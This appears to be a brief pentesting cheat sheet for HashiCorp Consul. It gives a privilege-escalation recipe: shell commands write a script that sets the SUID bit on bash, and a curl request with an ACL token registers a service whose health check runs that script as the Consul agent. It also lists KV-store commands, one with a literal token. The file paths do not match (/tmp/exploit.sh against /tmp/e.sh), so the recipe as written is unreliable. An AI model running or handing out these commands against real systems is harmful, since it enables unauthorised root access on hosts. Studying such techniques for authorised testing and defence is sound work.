HashiCorp Consul Pentesting

An open-source service networking platform developed by HashiCorp. A default port is 8500.

Privilege Escalation

If you have the ACL token (xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxxx), you may be able to privilege escalation.
First, create a script which changes the permission of ‘bash’.

echo 'chmod +s /usr/bin/bash' > /tmp/exploit.sh

Then curl.

curl --header "X-Consul-Token: <ACL-TOKEN>" --request PUT -d '{"ID": "test", "Name": "test", "Address": "127.0.0.1", "Port": 80, "check": {"Args": ["/usr/bin/bash", "/tmp/e.sh"], "interval": "10s", "timeout": "1s"}}' http://127.0.0.1:8500/v1/agent/service/register


KV (Key/Value) Store

# Put
consul kv put --token <ACL-TOKEN> key value
consul kv put --token bb03b43b-1d81-d62b-24b5-39540ee469b5 path/to/store data